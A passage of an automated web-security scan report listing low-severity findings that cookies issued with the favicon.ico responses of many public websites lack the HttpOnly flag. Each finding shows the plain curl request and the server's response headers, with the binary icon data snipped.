Host:   http://www.familydoctor.org
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.familydoctor.org
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 301 Moved Permanently
Date: Sat, 02 Apr 2011 14:03:17 GMT
Server: Apache
Location: http://familydoctor.org/favicon.ico
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: Coyote-2-d0238515=a0a0a66:0; expires=Sat, 02-Apr-11 18:03:17 GMT; path=/
Content-Length: 239

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<HTML><HEAD>
<TITLE>301 Moved Permanently</TITLE>
</HEAD><BODY>
<H1>Moved Permanently</H1>
The document has moved <A HREF="http://familydoctor.org/fa
...[SNIP]...
14.102. http://www.fedex.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.fedex.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.fedex.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Sat, 02 Apr 2011 13:24:32 GMT
Content-length: 3638
Content-type: image/x-icon
X-ua-compatible: IE=EmulateIE7
Set-cookie: fdx_cbid=22185494081301750672092920271330; expires=Monday, 18-January-2038 21:14:07 GMT; path=/; domain=.fedex.com
Last-modified: Thu, 14 Feb 2008 18:25:33 GMT
Etag: "e36-47b4879d"

..............h...&... ..............(....... ...........@............................cu...g.....fff......<S..............p...I^......oz...............................................................
...[SNIP]...
14.103. http://www.fool.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.fool.com
Path:   /favicon.ico

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.fool.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Content-Type: image/x-icon
Last-Modified: Sat, 15 Jul 2006 14:05:56 GMT
Accept-Ranges: bytes
ETag: "07a65ca17a8c61:0"
Server: Microsoft-IIS/7.0
P3P: policyref="http://www.fool.com/w3c/p3p.xml", CP="IDC DSP COR CUR ADMa DEVa TAIa CONo HISa TELo OUR PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA PRE LOC IND"
Set-Cookie: Sookie=source=&fy=false&ybls=0; domain=.fool.com; path=/
Set-Cookie: Wookie=Ref=http%3a%2f%2fnone%2f; domain=.fool.com; expires=Sun, 03-Apr-2011 13:35:38 GMT; path=/
Set-Cookie: Tookie=T=04877517183428375666730643888134; domain=.fool.com; expires=Tue, 30-Mar-2021 04:00:00 GMT; path=/
X-Powered-By: ASP.NET
Set-Cookie: v1st=8D3DBA4B712DAFA2; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.fool.com
Date: Sat, 02 Apr 2011 13:35:38 GMT
Content-Length: 4710

..............(...F...........h...n... .............. ...........    ..(....... ..........................................................................................................    ..............
...[SNIP]...
14.104. http://www.frontier.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.frontier.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.frontier.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Set-Cookie: ARPT=RNLPJJS10.160.118.21T0x0000000e_0xc70bab4cCMYJK; expires=Mon, 2-Apr-2012 14:14:35 GMT; path=/
Content-Length: 1406
Content-Type: image/x-icon
Last-Modified: Thu, 04 Mar 2010 19:40:47 GMT
Accept-Ranges: bytes
ETag: "80c92496d2bbca1:523"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sat, 02 Apr 2011 14:14:43 GMT

..............h.......(....... ...........@.......................MK......:6..>8..@:..D?..HD..WS..c_...~..........8/..91..70..=4..=4..C;..?9..E=..E=..E?..G?..F>..IC..NG..KE..SK..WP..WP..a[..b[..e^..id
...[SNIP]...
14.105. http://www.funbrain.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.funbrain.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.funbrain.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Accept-Ranges: bytes
Cache-Control: max-age=0
Content-Type: text/plain
Date: Sat, 02 Apr 2011 13:27:15 GMT
ETag: "436-3ba36634b1fc0"
Expires: Sat, 02 Apr 2011 13:27:15 GMT
Last-Modified: Tue, 01 Apr 2003 03:28:07 GMT
Server: Apache
Set-Cookie: Apache=10.243.58.175.1301750835307007; path=/; expires=Sun, 01-Apr-12 13:27:15 GMT; domain=.funbrain.com
Content-Length: 1078
Connection: keep-alive

..............(...&... ..........N...(....... .........................................................................................................................................................
...[SNIP]...
14.106. http://www.gamehouse.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.gamehouse.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.gamehouse.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:45:37 GMT
Server: Apache/2.2.11 (CentOS)
Last-Modified: Tue, 11 Nov 2008 01:40:48 GMT
ETag: "58b82a5-436-45b5ff805e800"
Accept-Ranges: bytes
Content-Length: 1078
Content-Type: text/plain; charset=UTF-8
Set-Cookie: NSC_xxx-hbnfipvtf=ffffffffaf16e33c45525d5f4f58455e445a4a423660;expires=Sun, 03-Apr-2011 15:07:42 GMT;path=/;domain=gamehouse.com

...... ..........&...........(.......(... ...@.........................................................................................................................................................
...[SNIP]...
14.107. http://www.gifts.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.gifts.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.gifts.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:26:31 GMT
Server: Apache
Last-Modified: Mon, 15 Jun 2009 23:19:40 GMT
ETag: "66b0-cbe-46c6b4adadb00"
Accept-Ranges: bytes
Content-Length: 3262
Connection: close
Content-Type: image/x-icon
Set-Cookie: SERVERID=web03; path=/
Cache-control: private

...... ..............(... ...@.........................................................................................................................................................................
...[SNIP]...
14.108. http://www.guardian.co.uk/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.guardian.co.uk
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.guardian.co.uk
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:31:58 GMT
Server: Apache
Set-Cookie: GU_MU=VFpjbFRncjZER01BQUJrWkhJMEFBQUhPfDY5VkZuRGVpTVd3ZzBJT0pFbVBrZ0E9PQ==; path=/; domain=.guardian.co.uk; expires=Tue, 30-Mar-2021 13:31:58 GMT
Last-Modified: Fri, 04 Apr 2008 16:07:11 GMT
Accept-Ranges: bytes
Content-Length: 895
Cache-Control: max-age=86400
Expires: Sun, 03 Apr 2011 13:31:58 GMT
X-GU-httpd: 06
P3P: CP="CAO CURa ADMa DEVa TAIa PSAa PSDa IVAa IVDa CONa TELa OUR IND ONLi UNI PURi NAV STA PRE LOC"
Vary: User-Agent
Connection: close
Content-Type: image/x-icon

..............h.......(....... ...............................L...w.........L.L.L.L.L.............L.L.L..d"...........f.|D.|D.|D..U............L.L.L.L..X..................................
...[SNIP]...
14.109. http://www.guitarcenter.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.guitarcenter.com
Path:   /favicon.ico

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.guitarcenter.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Sat, 02 Apr 2011 14:14:52 GMT
Server: Microsoft-IIS/6.0
ETag:
SN: 28
X-Powered-By: ASP.NET
Set-Cookie: ASP.NET_SessionId=cfhhpohbyrkjmlcxvhr5mdrd; path=/; HttpOnly
Set-Cookie: ref=; path=/
Set-Cookie: ref_d=4/2/2011 10:14:51 AM; path=/
Set-Cookie: source=; path=/
Set-Cookie: ad_id=; path=/
Set-Cookie: orig_ref=; expires=Sat, 16-Apr-2011 14:14:51 GMT; path=/
Set-Cookie: orig_ref_d=4/2/2011 10:14:51 AM; expires=Sat, 16-Apr-2011 14:14:51 GMT; path=/
Set-Cookie: orig_source=; expires=Sat, 16-Apr-2011 14:14:51 GMT; path=/
Set-Cookie: orig_ad_id=; expires=Sat, 16-Apr-2011 14:14:51 GMT; path=/
Set-Cookie: uid=36efd3e4-9a5c-4120-8cc5-e6a569099115; expires=Mon, 02-May-2011 14:14:51 GMT; path=/
Set-Cookie: IsLoyaltyAvailable=False; expires=Mon, 02-May-2011 14:14:52 GMT; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 65425


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00__htmHead"><s
...[SNIP]...
14.110. http://www.gunbroker.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.gunbroker.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.gunbroker.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Content-Type: image/x-icon
Last-Modified: Tue, 23 Nov 2010 16:10:33 GMT
Accept-Ranges: bytes
ETag: "8022abf4288bcb1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Sat, 02 Apr 2011 13:53:11 GMT
Content-Length: 578
Set-Cookie: sto-id=JGHHNMED; Expires=Tue, 30-Mar-2021 13:53:11 GMT; Path=/

GIF89a............Z..1...L.K..1..0..L..1.......q
.....7..-..+../..%:.9;{.'u.^....2A.9U.8...Q.Je....9l.F..0..>.r
..!.....8...Z.I..1A...".o...AV.J;.(.....6..<..(..e..7.v...8../..).. P....g|....,~.D..1.
...[SNIP]...
14.111. http://www.healthgrades.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.healthgrades.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.healthgrades.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Content-Length: 28454
Content-Type: image/x-icon
Last-Modified: Tue, 17 Mar 2009 16:28:25 GMT
Accept-Ranges: bytes
ETag: "b15990651da7c91:1ab3"
Server: Microsoft-IIS/6.0
P3P: policyref="/w3c/p3p.xml",CP="NON DSP COR PSDa OUR NOR UNI"
X-Powered-By: ASP.NET
Date: Sat, 02 Apr 2011 13:25:11 GMT
Set-Cookie: BIGipServerHealthgrades=1728839690.20480.0000; path=/

......@@.... .(B..F...00..........nB.. ..........._..........h....k..(...@......... ......B...................h*..h*..h*..h*..h*..h*..h*..h*..h*..h*..h*..h*..h*..h*..h*..h*..h*..h*..h*..h*..h*..h*..h
...[SNIP]...
14.112. http://www.hi5.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.hi5.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.hi5.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Accept-Ranges: bytes
ETag: W/"5430-1286911046000"
Last-Modified: Tue, 12 Oct 2010 19:17:26 GMT
Content-Length: 5430
Date: Sat, 02 Apr 2011 13:34:01 GMT
Set-Cookie: NSC_bqq-tfswfst-ofxvj=e246bf123660;expires=Sat, 02-Apr-11 14:16:46 GMT;path=/

...... .... .....&......... .h.......(... ...@..... ...................................................................................................................................................
...[SNIP]...
14.113. http://www.hiexpress.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.hiexpress.com
Path:   /favicon.ico

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.hiexpress.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Server: Apache/1.3.41 (Unix) Communique/4.0.4 mod_ssl/2.8.31 OpenSSL/0.9.8a
Content-Type: text/plain; charset=utf-8
P3P: CP="OTI DSP COR DEVa OUR NOR",policyref="http://dcs.ichotelsgroup.com/w3c/p3p.xml"
Last-Modified: Thu, 11 Jun 2009 15:08:05 GMT
ETag: "e6ba-47e-4a311dd5"
Accept-Ranges: bytes
Content-Length: 1150
Expires: Sat, 02 Apr 2011 13:36:17 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 02 Apr 2011 13:36:17 GMT
Connection: close
Set-Cookie: TLTSID=2FD741865D2E105D041AB024DF96EAB9; Path=/; Domain=.hiexpress.com
Set-Cookie: TLTUID=2FD741865D2E105D041AB024DF96EAB9; Path=/; Domain=.hiexpress.com; expires=Sat, 02-04-2021 13:36:17 GMT
Set-Cookie: datacenternode=us-md-vz;domain=.hiexpress.com;path=/

............ .h.......(....... ..... ...................................................................................................................................................................
...[SNIP]...
14.114. http://www.holidayinn.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.holidayinn.com
Path:   /favicon.ico

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.holidayinn.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Server: Apache/1.3.41 (Unix) Communique/4.0.4 mod_ssl/2.8.31 OpenSSL/0.9.8a
Content-Type: text/plain; charset=utf-8
P3P: CP="OTI DSP COR DEVa OUR NOR",policyref="http://dcs.ichotelsgroup.com/w3c/p3p.xml"
Last-Modified: Thu, 11 Jun 2009 15:08:05 GMT
ETag: "3c877-47e-4a311dd5"
Accept-Ranges: bytes
Content-Length: 1150
Expires: Sat, 02 Apr 2011 13:33:20 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 02 Apr 2011 13:33:20 GMT
Connection: close
Set-Cookie: TLTSID=C6463A385D2D105D01AFD68221F72F8C; Path=/; Domain=.holidayinn.com
Set-Cookie: TLTUID=C6463A385D2D105D01AFD68221F72F8C; Path=/; Domain=.holidayinn.com; expires=Sat, 02-04-2021 13:33:20 GMT
Set-Cookie: datacenternode=us-md-vz;domain=.holidayinn.com;path=/

............ .h.......(....... ..... .............................................................................................-.5.5.<.C.M.F.Y.B.N.5.L..r..*p..<.N.A.B.B.@.D.A.../.<.3...........    ...
...[SNIP]...
14.115. http://www.hotpads.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.hotpads.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.hotpads.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 301 Moved Permanently
Server: Apache-Coyote/1.1
Location: http://hotpads.com/favicon.ico
Content-Length: 0
Date: Sat, 02 Apr 2011 14:03:03 GMT
Set-Cookie: SRV=WebHead2; path=/
Cache-control: private

14.116. http://www.hsbccreditcard.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.hsbccreditcard.com
Path:   /favicon.ico

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.hsbccreditcard.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Server: ""
Date: Sat, 02 Apr 2011 13:36:20 GMT
Content-length: 318
Content-type: image/x-icon
Set-Cookie: WEBTRENDS_ID=173.193.214.243-1301751380.749994; path=/; expires=Tue, 30-Mar-2021 13:36:20 GMT
P3p: CP="CAO COR ADM DEVa TAIa PSA PSD IVAa IVDa CONa HIS OUR LEG CNT"
Expires: Sat, 02 Apr 2011 14:06:20 GMT
Last-modified: Fri, 01 Dec 2006 17:01:18 GMT
Surrogate-control: no-store
Content-language: en-US
Set-cookie: LASCCSSA2001US_ID=0000tCFy4-pMzGldJjX2lZkZUCn:15nk4pohe; Path=/
Cache-control: no-cache="set-cookie, set-cookie2"

..............(.......(....... .........................................................................................................................................................................
...[SNIP]...
14.117. http://www.hsn.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.hsn.com
Path:   /favicon.ico

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.hsn.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Content-Type: image/x-icon
Last-Modified: Wed, 23 Mar 2011 15:23:10 GMT
Accept-Ranges: bytes
ETag: "0c3ad376ee9cb1:1018"
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP COR LAW CURa ADMa DEVa PSAa PSDa OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
X-Powered-By: ASP.NET
Set-Cookie: TLTSID=1AFFB8CF42502BFE5047CC8E8E254915; domain=.hsn.com; path=/
Set-Cookie: TLTHID=1AFFB8CF42502BFE5047CC8E8E254915; domain=.hsn.com; path=/
Date: Sat, 02 Apr 2011 13:35:57 GMT
Content-Length: 894

..............h.......(....... ................................................r..:........8..s..........................q...~..}..|..}..}..~...
..t.................^.~..|..~..}..}..}..|..|..|.....\
...[SNIP]...
14.118. http://www.hubspot.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.hubspot.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.hubspot.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Connection: close
Date: Sat, 02 Apr 2011 13:38:50 GMT
Server: Microsoft-IIS/6.0
P3P: policyref="http://www.hubspot.com/w3c/p3p.xml", CP="CURa ADMa DEVa TAIa PSAa PSDa OUR IND DSP NON COR"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: .ASPXANONYMOUS=W8pkI80nzAEkAAAANTBkMjc1NTgtZmQyNC00MThhLWFhYzEtZmQ1NDcxZDliNjRm0; expires=Sat, 11-Jun-2011 00:18:50 GMT; path=/; HttpOnly
Cache-Control: private
Content-Type: image/x-icon
Content-Length: 1150
Set-Cookie: HUBSPOT130=68228268.20480.0000; path=/

............ .h.......(....... ..... ....................................................Y.n..(..........................................................P$....u........................................
...[SNIP]...
14.119. http://www.ichotelsgroup.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ichotelsgroup.com
Path:   /favicon.ico

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.ichotelsgroup.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Server: Apache/1.3.41 (Unix) Communique/4.0.4 mod_ssl/2.8.31 OpenSSL/0.9.8a
Content-Type: text/plain; charset=utf-8
P3P: CP="OTI DSP COR DEVa OUR NOR",policyref="http://dcs.ichotelsgroup.com/w3c/p3p.xml"
Last-Modified: Fri, 09 May 2008 23:45:44 GMT
ETag: "4158-57e-4824e228"
Accept-Ranges: bytes
Content-Length: 1406
Expires: Sat, 02 Apr 2011 13:37:25 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 02 Apr 2011 13:37:25 GMT
Connection: close
Set-Cookie: TLTSID=587EC2EE5D2E105D0C7CAE80051D85A1; Path=/; Domain=.ichotelsgroup.com
Set-Cookie: TLTUID=587EC2EE5D2E105D0C7CAE80051D85A1; Path=/; Domain=.ichotelsgroup.com; expires=Sat, 02-04-2021 13:37:25 GMT

..............h.......(....... ........................................................................ @.. `.. ... ... ... ...@...@ ..@@..@`..@...@...@...@...`...` ..`@..``..`...`...`...`........ ...
...[SNIP]...
14.120. http://www.imageshack.us/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.imageshack.us
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.imageshack.us
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Server: nginx/0.7.64
Date: Sat, 02 Apr 2011 13:31:41 GMT
Content-Type: image/x-icon
Content-Length: 1150
Last-Modified: Thu, 06 Aug 2009 00:27:03 GMT
Connection: close
Set-Cookie: is_uuid=8c73deec231e4ae196986744389ee358; expires=Thu, 31-Dec-37 23:55:55 GMT; domain=.imageshack.us; path=/
P3P: CP="NOI CUR ADM OUR NOR STA NID"
X-Server-Name-And-Port: _:14000
Accept-Ranges: bytes

............ .h.......(....... ..... ...................................................................".&1g..$...$...$...$........................................".&1g..$...$...$...$...$............
...[SNIP]...
14.121. http://www.in.gov/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.in.gov
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.in.gov
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:39:24 GMT
Server: Apache
Last-Modified: Tue, 25 Sep 2007 19:01:38 GMT
ETag: "21f435-47e-43afa5ddf6880"
Accept-Ranges: bytes
Content-Length: 1150
Content-Type: image/x-icon
Content-Language: en
Set-Cookie: BIGipServerwww.IN.gov-http=1865746442.20480.0000; expires=Sat, 02-Apr-2011 13:40:24 GMT; path=/

............ .h.......(....... ..... .....................................................................................................h# ug"..g"..g"..f!..f!.(f!.5..................................
...[SNIP]...
14.122. http://www.info.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.info.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.info.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Set-Cookie: Z=YOYLQIS74.205.26.218CKMLM; path=/
Date: Sat, 02 Apr 2011 13:39:22 GMT
Server: Apache
Last-Modified: Tue, 05 Feb 2008 12:02:40 GMT
ETag: "6683a5-57e-44568046cd800"
Accept-Ranges: bytes
Content-Length: 1406
Content-Type: image/x-icon

..............h.......(....... .....................................n.......U...........j..........h7..l7...I......tL..........}E..v@..........p=...............Y...U...s...Q.......[...`..........yT...
...[SNIP]...
14.123. http://www.infoplease.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.infoplease.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.infoplease.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:37:23 GMT
Server: Apache
Set-Cookie: Apache=173.193.214.243.1301751443376719; path=/; expires=Sun, 01-Apr-12 13:37:23 GMT
Last-Modified: Fri, 17 Jun 2005 14:58:05 GMT
ETag: "37e-3f9be36957940"
Accept-Ranges: bytes
Content-Length: 894
Cache-Control: max-age=604800
Expires: Sat, 09 Apr 2011 13:37:23 GMT
Content-Type: image/vnd.microsoft.icon

..............h.......(....... ...........@...................................................................................a..U..U..U..U..a..........................m).U..U..U..U..U..U..U..U..u1...
...[SNIP]...
14.124. http://www.informationgetter.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.informationgetter.com
Path:   /favicon.ico

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.informationgetter.com
Accept: */*
